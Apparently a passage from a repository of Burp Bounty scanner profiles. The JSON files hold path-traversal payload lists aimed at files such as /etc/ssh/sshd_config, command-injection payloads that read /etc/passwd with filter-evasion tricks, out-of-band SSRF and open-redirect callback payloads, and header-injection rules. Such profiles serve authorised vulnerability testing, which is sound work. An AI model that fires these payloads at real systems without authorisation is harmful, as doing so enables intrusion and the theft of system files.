86 | "PathTraversal",
87 | "All"
88 | ],
89 | "PayloadResponse": false,
90 | "NotResponse": false,
91 | "TimeOut1": "",
92 | "TimeOut2": "",
93 | "isTime": false,
94 | "contentLength": "",
95 | "iscontentLength": false,
96 | "CaseSensitive": false,
97 | "ExcludeHTTP": false,
98 | "OnlyHTTP": false,
99 | "IsContentType": false,
100 | "ContentType": "",
101 | "HttpResponseCode": "",
102 | "NegativeCT": false,
103 | "IsResponseCode": false,
104 | "ResponseCode": "",
105 | "NegativeRC": false,
106 | "urlextension": "",
107 | "isurlextension": false,
108 | "NegativeUrlExtension": false,
109 | "MatchType": 1,
110 | "Scope": 0,
111 | "RedirType": 0,
112 | "MaxRedir": 0,
113 | "payloadPosition": 1,
114 | "payloadsFile": "",
115 | "grepsFile": "",
116 | "IssueName": "Linux-php.ini",
117 | "IssueSeverity": "Medium",
118 | "IssueConfidence": "Certain",
119 | "IssueDetail": "Linux-php.ini: \u003cbr\u003e \u003cgrep\u003e",
120 | "RemediationDetail": "",
121 | "IssueBackground": "",
122 | "RemediationBackground": "",
123 | "Header": [
124 | {
125 | "type": "Payload",
126 | "match": "{FILE}",
127 | "replace": "apache2/php.ini",
128 | "regex": "String"
129 | }
130 | ],
131 | "VariationAttributes": [],
132 | "InsertionPointType": [
133 | 32,
134 | 0,
135 | 37
136 | ],
137 | "Scanas": false,
138 | "Scantype": 0,
139 | "pathDiscovery": false
140 | }
141 | ]
--------------------------------------------------------------------------------
/Linux-sshd-conf.bb:
--------------------------------------------------------------------------------
1 | [
2 | {
3 | "ProfileName": "Linux-sshd-conf",
4 | "Name": "",
5 | "Enabled": true,
6 | "Scanner": 1,
7 | "Author": "@Sy3Omda",
8 | "Payloads": [
9 | "true,..%5c..%5c{FILE}",
10 | "true,..%5c..%5c..%5c{FILE}",
11 | "true,..%5c..%5c..%5c..%5c{FILE}",
12 | "true,..%5c..%5c..%5c..%5c..%5c{FILE}",
13 | "true,..%5c..%5c..%5c..%5c..%5c..%5c{FILE}",
14 | "true,..%252f{FILE}",
15 | "true,..%252f..%252f{FILE}",
16 | "true,..%252f..%252f..%252f{FILE}",
17 | "true,..%252f..%252f..%252f..%252f{FILE}",
18 | "true,./../{FILE}",
19 | "true,./.././../{FILE}",
20 | "true,./.././.././.././../{FILE}",
21 | "true,./.././.././.././.././../{FILE}",
22 | "true,..///{FILE}",
23 | "true,..///..///{FILE}",
24 | "true,..///..///..///{FILE}",
25 | "true,..///..///..///..///{FILE}",
26 | "true,..///..///..///..///..///{FILE}",
27 | "true,..//{FILE}",
28 | "true,..//..//{FILE}",
29 | "true,..//..//..//{FILE}",
30 | "true,..//..//..//..//{FILE}",
31 | "true,..//..//..//..//..//{FILE}",
32 | "true,../{FILE}",
33 | "true,../../{FILE}",
34 | "true,../../../{FILE}",
35 | "true,../../../../{FILE}",
36 | "true,../../../../../{FILE}",
37 | "true,../{FILE}%00",
38 | "true,../../{FILE}%00",
39 | "true,../../../{FILE}%00",
40 | "true,../../../../{FILE}%00",
41 | "true,../../../../../{FILE}%00",
42 | "true,....//{FILE}",
43 | "true,....//....//{FILE}",
44 | "true,....//....//....//{FILE}",
45 | "true,....//....//....//....//{FILE}",
46 | "true,....//....//....//....//....//{FILE}",
47 | "true,....%2F%2F{FILE}",
48 | "true,....%2F%2F....%2F%2F{FILE}",
49 | "true,....%2F%2F....%2F%2F....%2F%2F{FILE}",
50 | "true,....%2F%2F....%2F%2F....%2F%2F....%2F%2F{FILE}",
51 | "true,....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F{FILE}",
52 | "true,....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F{FILE}",
53 | "true,..%2f{FILE}",
54 | "true,..%2f..%2f{FILE}",
55 | "true,..%2f..%2f..%2f{FILE}",
56 | "true,..%2f..%2f..%2f..%2f{FILE}",
57 | "true,..%2f..%2f..%2f..%2f..%2f{FILE}",
58 | "true,..%%32%66{FILE}",
59 | "true,..%%32%66..%%32%66{FILE}",
60 | "true,..%%32%66..%%32%66..%%32%66{FILE}",
61 | "true,..%%32%66..%%32%66..%%32%66..%%32%66{FILE}",
62 | "true,..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}",
63 | "true,%2e%2e/{FILE}",
64 | "true,%2e%2e/%2e%2e/{FILE}",
65 | "true,%2e%2e/%2e%2e/%2e%2e/{FILE}",
66 | "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
67 | "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
68 | "true,%252e%252e/{FILE}",
69 | "true,%252e%252e/%252e%252e/{FILE}",
70 | "true,%252e%252e/%252e%252e/%252e%252e/{FILE}",
71 | "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
72 | "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
73 | "true,%%32%65%%32%65/{FILE}",
74 | "true,%%32%65%%32%65/%%32%65%%32%65/{FILE}",
75 | "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
76 | "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
77 | "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}"
78 | ],
79 | "Encoder": [],
80 | "UrlEncode": false,
81 | "CharsToUrlEncode": "",
82 | "Grep": [
83 | "true,,HostKey"
84 | ],
85 | "Tags": [
86 | "PathTraversal",
87 | "All"
88 | ],
89 | "PayloadResponse": false,
90 | "NotResponse": false,
91 | "TimeOut1": "",
92 | "TimeOut2": "",
93 | "isTime": false,
94 | "contentLength": "",
95 | "iscontentLength": false,
96 | "CaseSensitive": false,
97 | "ExcludeHTTP": false,
98 | "OnlyHTTP": false,
99 | "IsContentType": false,
100 | "ContentType": "",
101 | "HttpResponseCode": "",
102 | "NegativeCT": false,
103 | "IsResponseCode": false,
104 | "ResponseCode": "",
105 | "NegativeRC": false,
106 | "urlextension": "",
107 | "isurlextension": false,
108 | "NegativeUrlExtension": false,
109 | "MatchType": 1,
110 | "Scope": 0,
111 | "RedirType": 0,
112 | "MaxRedir": 0,
113 | "payloadPosition": 1,
114 | "payloadsFile": "",
115 | "grepsFile": "",
116 | "IssueName": "Linux-sshd-conf",
117 | "IssueSeverity": "Medium",
118 | "IssueConfidence": "Certain",
119 | "IssueDetail": "Linux-sshd-conf: \u003cbr\u003e \u003cgrep\u003e",
120 | "RemediationDetail": "",
121 | "IssueBackground": "",
122 | "RemediationBackground": "",
123 | "Header": [
124 | {
125 | "type": "Payload",
126 | "match": "{FILE}",
127 | "replace": "etc/ssh/sshd_config",
128 | "regex": "String"
129 | }
130 | ],
131 | "VariationAttributes": [],
132 | "InsertionPointType": [
133 | 32,
134 | 0,
135 | 37
136 | ],
137 | "Scanas": false,
138 | "Scantype": 0,
139 | "pathDiscovery": false
140 | }
141 | ]
--------------------------------------------------------------------------------
/Linux-vsftpd-conf.bb:
--------------------------------------------------------------------------------
1 | [
2 | {
3 | "ProfileName": "Linux-vsftpd-conf",
4 | "Name": "",
5 | "Enabled": true,
6 | "Scanner": 1,
7 | "Author": "@Sy3Omda",
8 | "Payloads": [
9 | "true,..%5c..%5c{FILE}",
10 | "true,..%5c..%5c..%5c{FILE}",
11 | "true,..%5c..%5c..%5c..%5c{FILE}",
12 | "true,..%5c..%5c..%5c..%5c..%5c{FILE}",
13 | "true,..%5c..%5c..%5c..%5c..%5c..%5c{FILE}",
14 | "true,..%252f{FILE}",
15 | "true,..%252f..%252f{FILE}",
16 | "true,..%252f..%252f..%252f{FILE}",
17 | "true,..%252f..%252f..%252f..%252f{FILE}",
18 | "true,./../{FILE}",
19 | "true,./.././../{FILE}",
20 | "true,./.././.././.././../{FILE}",
21 | "true,./.././.././.././.././../{FILE}",
22 | "true,..///{FILE}",
23 | "true,..///..///{FILE}",
24 | "true,..///..///..///{FILE}",
25 | "true,..///..///..///..///{FILE}",
26 | "true,..///..///..///..///..///{FILE}",
27 | "true,..//{FILE}",
28 | "true,..//..//{FILE}",
29 | "true,..//..//..//{FILE}",
30 | "true,..//..//..//..//{FILE}",
31 | "true,..//..//..//..//..//{FILE}",
32 | "true,../{FILE}",
33 | "true,../../{FILE}",
34 | "true,../../../{FILE}",
35 | "true,../../../../{FILE}",
36 | "true,../../../../../{FILE}",
37 | "true,../{FILE}%00",
38 | "true,../../{FILE}%00",
39 | "true,../../../{FILE}%00",
40 | "true,../../../../{FILE}%00",
41 | "true,../../../../../{FILE}%00",
42 | "true,....//{FILE}",
43 | "true,....//....//{FILE}",
44 | "true,....//....//....//{FILE}",
45 | "true,....//....//....//....//{FILE}",
46 | "true,....//....//....//....//....//{FILE}",
47 | "true,....%2F%2F{FILE}",
48 | "true,....%2F%2F....%2F%2F{FILE}",
49 | "true,....%2F%2F....%2F%2F....%2F%2F{FILE}",
50 | "true,....%2F%2F....%2F%2F....%2F%2F....%2F%2F{FILE}",
51 | "true,....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F{FILE}",
52 | "true,....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F{FILE}",
53 | "true,..%2f{FILE}",
54 | "true,..%2f..%2f{FILE}",
55 | "true,..%2f..%2f..%2f{FILE}",
56 | "true,..%2f..%2f..%2f..%2f{FILE}",
57 | "true,..%2f..%2f..%2f..%2f..%2f{FILE}",
58 | "true,..%%32%66{FILE}",
59 | "true,..%%32%66..%%32%66{FILE}",
60 | "true,..%%32%66..%%32%66..%%32%66{FILE}",
61 | "true,..%%32%66..%%32%66..%%32%66..%%32%66{FILE}",
62 | "true,..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}",
63 | "true,%2e%2e/{FILE}",
64 | "true,%2e%2e/%2e%2e/{FILE}",
65 | "true,%2e%2e/%2e%2e/%2e%2e/{FILE}",
66 | "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
67 | "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
68 | "true,%252e%252e/{FILE}",
69 | "true,%252e%252e/%252e%252e/{FILE}",
70 | "true,%252e%252e/%252e%252e/%252e%252e/{FILE}",
71 | "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
72 | "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
73 | "true,%%32%65%%32%65/{FILE}",
74 | "true,%%32%65%%32%65/%%32%65%%32%65/{FILE}",
75 | "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
76 | "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
77 | "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}"
78 | ],
79 | "Encoder": [],
80 | "UrlEncode": false,
81 | "CharsToUrlEncode": "",
82 | "Grep": [
83 | "true,,Example config file"
84 | ],
85 | "Tags": [
86 | "PathTraversal",
87 | "All"
88 | ],
89 | "PayloadResponse": false,
90 | "NotResponse": false,
91 | "TimeOut1": "",
92 | "TimeOut2": "",
93 | "isTime": false,
94 | "contentLength": "",
95 | "iscontentLength": false,
96 | "CaseSensitive": false,
97 | "ExcludeHTTP": false,
98 | "OnlyHTTP": false,
99 | "IsContentType": false,
100 | "ContentType": "",
101 | "HttpResponseCode": "",
102 | "NegativeCT": false,
103 | "IsResponseCode": false,
104 | "ResponseCode": "",
105 | "NegativeRC": false,
106 | "urlextension": "",
107 | "isurlextension": false,
108 | "NegativeUrlExtension": false,
109 | "MatchType": 1,
110 | "Scope": 0,
111 | "RedirType": 0,
112 | "MaxRedir": 0,
113 | "payloadPosition": 1,
114 | "payloadsFile": "",
115 | "grepsFile": "",
116 | "IssueName": "Linux-vsftpd-conf",
117 | "IssueSeverity": "Medium",
118 | "IssueConfidence": "Certain",
119 | "IssueDetail": "Path traversal payload: \u003cpayload\u003e\u003cbr\u003e\u003cbr\u003e\nThe response to a traversal payload requesting etc/vsftpd.conf contained the string Example config file (matched case-insensitively), a phrase taken from the header comment of the stock vsftpd.conf. Confirm manually that the body is an actual vsftpd configuration (directive lines such as listen or anonymous_enable) and not a documentation or tutorial page quoting the same comment; a single keyword hit on its own does not justify the Certain confidence this profile assigns.\u003cbr\u003e",
120 | "RemediationDetail": "",
121 | "IssueBackground": "",
122 | "RemediationBackground": "",
123 | "Header": [
124 | {
125 | "type": "Payload",
126 | "match": "{FILE}",
127 | "replace": "etc/vsftpd.conf",
128 | "regex": "String"
129 | }
130 | ],
131 | "VariationAttributes": [],
132 | "InsertionPointType": [
133 | 32,
134 | 0,
135 | 37
136 | ],
137 | "Scanas": false,
138 | "Scantype": 0,
139 | "pathDiscovery": false
140 | }
141 | ]
--------------------------------------------------------------------------------
/OOB-Callbacks.bb:
--------------------------------------------------------------------------------
1 | [
2 | {
3 | "ProfileName": "OOB-Callbacks",
4 | "Name": "",
5 | "Enabled": true,
6 | "Scanner": 1,
7 | "Author": "@Sy3Omda",
8 | "Payloads": [
9 | "true,%00/{BC}",
10 | "true,%09/{BC}",
11 | "true,%0a/{BC}",
12 | "true,%0d/{BC}",
13 | "true,1/_https@{BC}",
14 | "true,%5C%5C{BC}/%252e%252e%252f",
15 | "true,/%5c{BC}",
16 | "true,%5C{BC}",
17 | "true,%5c{BC}/%2f%2e%2e",
18 | "true,../{BC}",
19 | "true,.{BC}",
20 | "true,////\\;@{BC}",
21 | "true,///{BC}",
22 | "true,///{BC}@/",
23 | "true,//;@{BC}",
24 | "true,//\\/{BC}",
25 | "true,//\\@{BC}",
26 | "true,//\\{BC}",
27 | "true,//{BC}/",
28 | "true,//{BC}@/",
29 | "true,/\u003c\u003e//{BC}",
30 | "true,/\\/\\/{BC}",
31 | "true,/\\/{BC}",
32 | "true,/\\{BC}",
33 | "true,/{BC}",
34 | "true,\u003c\u003e//{BC}",
35 | "true,@{BC}",
36 | "true,\\/\\/{BC}",
37 | "true,{BC}/",
38 | "true,{BC};@",
39 | "true,//{BC}/%2F..",
40 | "true,/{BC}/%2F..",
41 | "true,///{BC}/%2f%2e%2e",
42 | "true,/{BC}/..;/css",
43 | "true,//{BC}\\t{BC}",
44 | "true,example%E3%80%82com",
45 | "true,https://%09/{BC}",
46 | "true,https:%0a%0d{BC}",
47 | "true,https://%0a%0d{BC}",
48 | "true,https://%23.{BC}",
49 | "true,https://%2f%2f.{BC}",
50 | "true,https%3a%2f%2f{BC}%2f",
51 | "true,https://%3F.{BC}",
52 | "true,https://%5c%5c.{BC}",
53 | "true,https://%5c{BC}@",
54 | "true,https://:80#@{BC}",
55 | "true,https://:80?@{BC}",
56 | "true,//https://{BC}@/",
57 | "true,/https:{BC}",
58 | "true,@https://{BC}",
59 | "true,https://.{BC}",
60 | "true,https://////{BC}",
61 | "true,https:///{BC}",
62 | "true,https://:@\\@{BC}",
63 | "true,https://;@{BC}",
64 | "true,https:/\\/\\{BC}",
65 | "true,https:/\\{BC}",
66 | "true,https:/{BC}",
67 | "true,https:{BC}",
68 | "true,https:///{BC}/%2e%2e",
69 | "true,https:///{BC}/%2f%2e%2e",
70 | "true,https://:@{BC}\\@{BC}",
71 | "true,https://{BC}/{BC}",
72 | "true,https:///{BC}@{BC}/%2e%2e",
73 | "true,https:///{BC}@{BC}/%2f%2e%2e",
74 | "true,https://{BC}/https://{BC}",
75 | "true,https://:@{BC}\\@WillBeReplaced.com",
76 | "true,https://\\t{BC}",
77 | "true,https://www.\\.{BC}",
78 | "true,//\\t{BC}"
79 | ],
80 | "Encoder": [],
81 | "UrlEncode": false,
82 | "CharsToUrlEncode": "",
83 | "Grep": [],
84 | "Tags": [
85 | "Collaborator",
86 | "All"
87 | ],
88 | "PayloadResponse": false,
89 | "NotResponse": false,
90 | "TimeOut1": "",
91 | "TimeOut2": "",
92 | "isTime": false,
93 | "contentLength": "",
94 | "iscontentLength": false,
95 | "CaseSensitive": false,
96 | "ExcludeHTTP": false,
97 | "OnlyHTTP": false,
98 | "IsContentType": false,
99 | "ContentType": "",
100 | "HttpResponseCode": "",
101 | "NegativeCT": false,
102 | "IsResponseCode": false,
103 | "ResponseCode": "",
104 | "NegativeRC": false,
105 | "urlextension": "",
106 | "isurlextension": false,
107 | "NegativeUrlExtension": false,
108 | "MatchType": 1,
109 | "Scope": 0,
110 | "RedirType": 4,
111 | "MaxRedir": 9,
112 | "payloadPosition": 1,
113 | "payloadsFile": "",
114 | "grepsFile": "",
115 | "IssueName": "OOB-Callbacks",
116 | "IssueSeverity": "Medium",
117 | "IssueConfidence": "Firm",
118 | "IssueDetail": "Payload: \u003cpayload\u003e\u003cbr\u003e\u003cbr\u003e\nA Collaborator interaction was received after this payload was injected. It may be an SSRF callback (the target server resolved or fetched the Collaborator host) or simply an open redirect that was followed by the client. Check the interaction type and source address in the Collaborator client: an interaction originating from the target infrastructure points to SSRF, one originating from your own Burp instance points to an open redirect. Note that this profile is configured with redirect following enabled (RedirType 4, MaxRedir 9), so the scanner itself may generate the interaction by following a redirect.\u003cbr\u003e",
119 | "RemediationDetail": "",
120 | "IssueBackground": "",
121 | "RemediationBackground": "",
122 | "Header": [],
123 | "VariationAttributes": [],
124 | "InsertionPointType": [
125 | 65,
126 | 1,
127 | 0,
128 | 37
129 | ],
130 | "Scanas": false,
131 | "Scantype": 0,
132 | "pathDiscovery": false
133 | }
134 | ]
--------------------------------------------------------------------------------
/RCE-linux-Based.bb:
--------------------------------------------------------------------------------
1 | [
2 | {
3 | "ProfileName": "RCE-linux-Based",
4 | "Name": "",
5 | "Enabled": true,
6 | "Scanner": 1,
7 | "Author": "@Sy3Omda",
8 | "Payloads": [
9 | "true,;cat /e${hahaha}tc/${heywaf}pas${catchthis}swd",
10 | "true,;cat$u /etc$u/passwd$u",
11 | "true,;{cat,/etc/passwd}",
12 | "true,;cat\u003c/etc/passwd",
13 | "true,;/???/??t /???/??ss??",
14 | "true,%0Acat%20/etc/passwd",
15 | "true,;cat$IFS/etc/passwd",
16 | "true,;echo${IFS}\"RCE\"${IFS}\u0026\u0026cat${IFS}/etc/passwd",
17 | "true,;who$@ami",
18 | "true,;w\\ho\\am\\i",
19 | "true,;w\"h\"o\"am\"i",
20 | "true,;w\u0027h\u0027o\u0027am\u0027i",
21 | "true,a;id;",
22 | "true,|/bin/ls -al",
23 | "true,a;/usr/bin/id;"
24 | ],
25 | "Encoder": [],
26 | "UrlEncode": false,
27 | "CharsToUrlEncode": "",
28 | "Grep": [
29 | "true,,root:x",
30 | "true,Or,www-data"
31 | ],
32 | "Tags": [
33 | "All",
34 | "RCE"
35 | ],
36 | "PayloadResponse": false,
37 | "NotResponse": false,
38 | "TimeOut1": "",
39 | "TimeOut2": "",
40 | "isTime": false,
41 | "contentLength": "",
42 | "iscontentLength": false,
43 | "CaseSensitive": false,
44 | "ExcludeHTTP": false,
45 | "OnlyHTTP": false,
46 | "IsContentType": false,
47 | "ContentType": "",
48 | "HttpResponseCode": "",
49 | "NegativeCT": false,
50 | "IsResponseCode": false,
51 | "ResponseCode": "",
52 | "NegativeRC": false,
53 | "urlextension": "",
54 | "isurlextension": false,
55 | "NegativeUrlExtension": false,
56 | "MatchType": 1,
57 | "Scope": 0,
58 | "RedirType": 0,
59 | "MaxRedir": 0,
60 | "payloadPosition": 2,
61 | "payloadsFile": "",
62 | "grepsFile": "",
63 | "IssueName": "RCE-linux-Based",
64 | "IssueSeverity": "High",
65 | "IssueConfidence": "Certain",
66 | "IssueDetail": "RCE payload: \u003cbr\u003e \u003cpayload\u003e\u003cbr\u003e\u003cbr\u003e\nThe response matched either root:x or www-data (case-insensitive, OR-ed in the Grep setting). A match on root:x normally indicates /etc/passwd content was returned; a match on www-data alone is weaker, since that string can appear in ordinary page content, stack traces or error output. Inspect the response for genuine /etc/passwd lines or id/whoami output before treating this as confirmed command execution.\u003cbr\u003e",
67 | "RemediationDetail": "",
68 | "IssueBackground": "",
69 | "RemediationBackground": "",
70 | "Header": [],
71 | "VariationAttributes": [],
72 | "InsertionPointType": [
73 | 65,
74 | 32,
75 | 2,
76 | 0,
77 | 37
78 | ],
79 | "Scanas": false,
80 | "Scantype": 0,
81 | "pathDiscovery": false
82 | }
83 | ]
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # burp-bounty
2 |
3 | Burp Bounty is an extension for Burp Suite that improves the Burp scanner with custom active and passive profiles. The `.bb` files in this repository are such profiles; review each profile's grep strings and confidence level before relying on its findings, since keyword matches alone can produce false positives.
4 | The Original Repo: https://github.com/wagiro/BurpBounty
5 | Author Twitter: [egarme](https://twitter.com/egarme)
6 |
7 | ## Profiles
8 |
9 | #### Active Scanner
10 | * Linux Apache2 conf
11 | * Linux mysql conf
12 | * Linux self environ
13 | * Linux source list
14 | * Linux sshd conf
15 | * Linux vsftpd conf
16 | * Linux vsftpd log
17 |
18 | #### Passive Scanner
19 | * Creds Disclosed
20 | * JWT-Request
21 | * JWT-Response
22 | * GraphqlPath
23 |
--------------------------------------------------------------------------------
/X-Headers-Collaborator.bb:
--------------------------------------------------------------------------------
1 | [
2 | {
3 | "ProfileName": "X-Headers-Collaborator",
4 | "Name": "",
5 | "Enabled": true,
6 | "Scanner": 1,
7 | "Author": "@Sy3Omda",
8 | "Payloads": [
9 | "true,http://{BC}",
10 | "true,{BC}"
11 | ],
12 | "Encoder": [],
13 | "UrlEncode": false,
14 | "CharsToUrlEncode": "",
15 | "Grep": [],
16 | "Tags": [
17 | "Collaborator",
18 | "All"
19 | ],
20 | "PayloadResponse": false,
21 | "NotResponse": false,
22 | "TimeOut1": "",
23 | "TimeOut2": "",
24 | "isTime": false,
25 | "contentLength": "",
26 | "iscontentLength": false,
27 | "CaseSensitive": false,
28 | "ExcludeHTTP": false,
29 | "OnlyHTTP": false,
30 | "IsContentType": false,
31 | "ContentType": "",
32 | "HttpResponseCode": "",
33 | "NegativeCT": false,
34 | "IsResponseCode": false,
35 | "ResponseCode": "",
36 | "NegativeRC": false,
37 | "urlextension": "",
38 | "isurlextension": false,
39 | "NegativeUrlExtension": false,
40 | "MatchType": 1,
41 | "Scope": 0,
42 | "RedirType": 0,
43 | "MaxRedir": 0,
44 | "payloadPosition": 1,
45 | "payloadsFile": "",
46 | "grepsFile": "",
47 | "IssueName": "X-Headers-Collaborator",
48 | "IssueSeverity": "Medium",
49 | "IssueConfidence": "Firm",
50 | "IssueDetail": "Payload: \u003cpayload\u003e\u003cbr\u003e\u003cbr\u003e\nA Collaborator interaction was received after the payload was substituted into forwarding and client-identification request headers present in the original request (X-Forwarded-For, X-Forwarded-Host, X-Original-URL, X-Rewrite-URL, Forwarded, Origin, Referer, Client-IP and similar). Only headers already present in the request are rewritten by this profile. Check the interaction type and source in the Collaborator client and whether the injected value is reflected in the response: a DNS or HTTP request from the target infrastructure suggests SSRF, host-header poisoning or back-end resolution of the injected value, whereas reflection into links or redirects in the response points to a client-side issue instead.\u003cbr\u003e",
51 | "RemediationDetail": "",
52 | "IssueBackground": "",
53 | "RemediationBackground": "",
54 | "Header": [
55 | {
56 | "type": "Request",
57 | "match": "X-Forwarded-For:.*",
58 | "replace": "X-Forwarded-For: {PAYLOAD}",
59 | "regex": "Regex"
60 | },
61 | {
62 | "type": "Request",
63 | "match": "X-Host:.*",
64 | "replace": "X-Host: {PAYLOAD}",
65 | "regex": "Regex"
66 | },
67 | {
68 | "type": "Request",
69 | "match": "X-Forwarded-Server:.*",
70 | "replace": "X-Forwarded-Server: {PAYLOAD}",
71 | "regex": "Regex"
72 | },
73 | {
74 | "type": "Request",
75 | "match": "X-Forwarded-Scheme:.*",
76 | "replace": "X-Forwarded-Scheme: {PAYLOAD}",
77 | "regex": "Regex"
78 | },
79 | {
80 | "type": "Request",
81 | "match": "X-Original-URL:.*",
82 | "replace": "X-Original-URL: {PAYLOAD}",
83 | "regex": "Regex"
84 | },
85 | {
86 | "type": "Request",
87 | "match": "X-Rewrite-URL:.*",
88 | "replace": "X-Rewrite-URL: {PAYLOAD}",
89 | "regex": "Regex"
90 | },
91 | {
92 | "type": "Request",
93 | "match": "Forwarded: for\u003d.*",
94 | "replace": "Forwarded: for\u003d{PAYLOAD}",
95 | "regex": "Regex"
96 | },
97 | {
98 | "type": "Request",
99 | "match": "Origin:.*",
100 | "replace": "Origin: {PAYLOAD}",
101 | "regex": "Regex"
102 | },
103 | {
104 | "type": "Request",
105 | "match": "Referer:.*",
106 | "replace": "Referer: {PAYLOAD}",
107 | "regex": "Regex"
108 | },
109 | {
110 | "type": "Request",
111 | "match": "X-Forwarded-Host:.*",
112 | "replace": "X-Forwarded-Host: {PAYLOAD}",
113 | "regex": "Regex"
114 | },
115 | {
116 | "type": "Request",
117 | "match": "X-Forwarded-Proto:.*",
118 | "replace": "X-Forwarded-Proto: {PAYLOAD}",
119 | "regex": "Regex"
120 | },
121 | {
122 | "type": "Request",
123 | "match": "X-ProxyUser-Ip:.*",
124 | "replace": "X-ProxyUser-Ip: {PAYLOAD}",
125 | "regex": "Regex"
126 | },
127 | {
128 | "type": "Request",
129 | "match": "X-Wap-Profile:.*",
130 | "replace": "X-Wap-Profile: {PAYLOAD}",
131 | "regex": "Regex"
132 | },
133 | {
134 | "type": "Request",
135 | "match": "Client-IP:.*",
136 | "replace": "Client-IP: {PAYLOAD}",
137 | "regex": "Regex"
138 | },
139 | {
140 | "type": "Request",
141 | "match": "True-Client-IP:.*",
142 | "replace": "True-Client-IP: {PAYLOAD}",
143 | "regex": "Regex"
144 | },
145 | {
146 | "type": "Request",
147 | "match": "Cluster-Client-IP:.*",
148 | "replace": "Cluster-Client-IP: {PAYLOAD}",
149 | "regex": "Regex"
150 | }
151 | ],
152 | "VariationAttributes": [],
153 | "InsertionPointType": [
154 | 32
155 | ],
156 | "Scanas": false,
157 | "Scantype": 0,
158 | "pathDiscovery": false
159 | }
160 | ]
--------------------------------------------------------------------------------
/tags.txt:
--------------------------------------------------------------------------------
1 | Collaborator
2 | PathTraversal
3 | RCE
4 | SQLi
5 | CookieAttributes
6 | SecurityHeaders
7 | XSS
8 | JWT
9 | CMS
10 | CVE
11 | Errors
12 | InformationDisclosure
13 | API
14 | SQLi
15 | XXE
16 | endpoints
17 | regex
18 | Variations
19 | Graphql
20 | Cloud
21 | All
22 | Mobile
23 | log4shell
24 |
--------------------------------------------------------------------------------